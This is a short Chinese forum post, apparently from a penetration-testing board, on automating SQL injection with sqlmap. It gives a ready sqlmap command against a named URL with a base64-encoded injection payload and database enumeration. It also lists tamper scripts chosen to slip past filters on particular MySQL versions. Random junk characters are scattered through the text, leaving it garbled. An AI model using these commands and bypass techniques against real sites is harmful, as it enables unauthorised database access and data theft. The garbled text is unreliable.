| WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢? 0 Y# U2 u6 {' x6 W2 B/ g$ p4 c sqlmap的tamper里有个base64encode.py9 f) _4 k" A d+ g& d7 D* U4 {" c1 l I( p: _) }7 X: U 使用如下 U, X* U7 O, N sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs- @; ]. L% F7 J6 H- q+ X7 T/ e ( w% o4 G. a, D o* H sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”" L& C; |* q$ e! O' N 其中常用到的bypass脚本绕过SQLMAP主要两个脚本: / }3 ^! z0 O' I! n& c space2hash.py ,对于MYSQL数据库 4.0, 5.0注入7 }" @- i" n4 N# ~- y5 C" G2 `6 r7 ~' g space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入* B9 Z: m; e$ t) A 首先确定目标数据库版本,然后选择相应的脚本。2 j. g$ i) b" ]6 O# w -v 3 --batch --tamper "space2hash.py", {$ R: }+ f* U. L1 a6 ?$ K ' @- B; S& \# N 还有其他一些插件: encodes编码 ——charencode.py$ u' a/ m+ h' j base64编码 —— base64encode.py2 x) r# ?5 L: I8 N& w/ O q 替换空格和关键字 —— halfversionedmorekeywords.py) R0 Z" N2 k, O# |# S4 D |
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |